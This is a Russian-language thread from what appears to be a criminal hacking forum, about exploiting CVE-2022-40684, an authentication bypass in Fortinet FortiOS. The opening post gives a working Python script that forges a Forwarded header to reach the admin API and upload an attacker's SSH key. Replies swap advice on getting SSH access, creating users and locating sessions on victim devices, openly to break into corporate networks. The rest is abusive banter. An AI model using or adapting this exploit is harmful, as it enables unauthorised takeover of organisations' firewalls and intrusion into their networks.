• XSS.stack #1 – первый литературный журнал от юзеров форума

фортик

CCod

(L3) cache
Пользователь
Регистрация
08.01.2022
Сообщения
280
Реакции
60
Всем привет.Эксплуатирую CVE-2022-40684(auth bypass в фортике).Написал такой скрипт для подгрузки своего ssh ключа:
import requests,sys

t=sys.argv[1]
headers={
"User-Agent": "Report Runner",
"Content-Type": "application/json",
"Forwarded": "for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;",}

payload={"ssh-public-key1": "\"id_rsa.pub\""}
r=requests.put(t+"/api/v2/cmdb/system/admin/admin",headers=headers,data=payload,verify=False)

ключ сгенерировал так;
ssh-keygen

При попытке ssh admin@victim -i id_rsa :
nable to negotiate with victim port 22: no matching host key type found. Their offer: ssh-rsa

Как исправить?
 
странная тема, после попыток раз 10 создать юзера, к клиенту хрен подключается с ошибкой -7200, никто не шарил данный эксплоит по поводу путей в директории где лежат сессии
 
ах да я же забыл хер кто тут инфой поделится или даже станет ковырять, им все готовое нужно подавать ;D иногда есть такой интересный фактор, или тут люди срутся что то выкладывать найденную инфу, или же боятся показать то что они что то знают
 
Последнее редактирование:
странная тема, после попыток раз 10 создать юзера, к клиенту хрен подключается с ошибкой -7200, никто не шарил данный эксплоит по поводу путей в директории где лежат сессии
апи ковыряю, ни сессии ни пароли , где лежат, пока не нашел
 
Пожалуйста, обратите внимание, что пользователь заблокирован
да это х#йня, там и так и так можно к ssh получить доступ
ну как? просто хоть какую то наводку, т.к у меня пустые резы
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Естественный отбор в наглядном примере - кучка дебилов ждут подачки от более умной особи. Не по Сеньке шапка, пиздуйте на завод. Корпы они тут ломают, бл#ть
 
Естественный отбор в наглядном примере - кучка дебилов ждут подачки от более умной особи. Не по Сеньке шапка, пиздуйте на завод. Корпы они тут ломают, бл#ть
чел, вообще не в тему пишешь. ты там успокойся, водочки выпей, глянь первый канал и ложись спать. и не надо дичь печатать. спасибо.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
чел, вообще не в тему пишешь. ты там успокойся, водочки выпей, глянь первый канал и ложись спать. и не надо дичь печатать. спасибо.
Ух ты. А где в этом треде твой пост "в тему"? Многозначительный пердеж - ахахах, эхх, мсф... импакт ебануться. Успехов вам в доеданиях
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Так это не даёт резов
всё даёт! есть ссш значит можно создать юзера, команды только знать надо.
пс. всё точно так же как и с циско!
не сцыте скоро появится рабочий варик на гиде, для долбоящеров )))))))))
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
всё даёт! есть ссш значит можно создать юзера, команды только знать надо.
пс. всё точно так же как и с циско!
не сцыте скоро появится рабочий варик на гиде, для долбоящеров )))))))))
Да ССХ ясно дело, это понимаю, но сами Резы не идут.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Пожалуйста, обратите внимание, что пользователь заблокирован
Код:
> fortios_7_2_1 #

ну а че писать то, в консоли той
добавить Юзера каким то образом )
 
Естественный отбор в наглядном примере - кучка дебилов ждут подачки от более умной особи. Не по Сеньке шапка, пиздуйте на завод. Корпы они тут ломают, бл#ть
Что-бы пойти на завод необходимо закончить хотя-бы ПТУ! :t
 
Что-бы пойти на завод необходимо закончить хотя-бы ПТУ! :t
не щас туда берут всех дэбилов, прям там и научат как кувалду в руках держать и лом )))
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх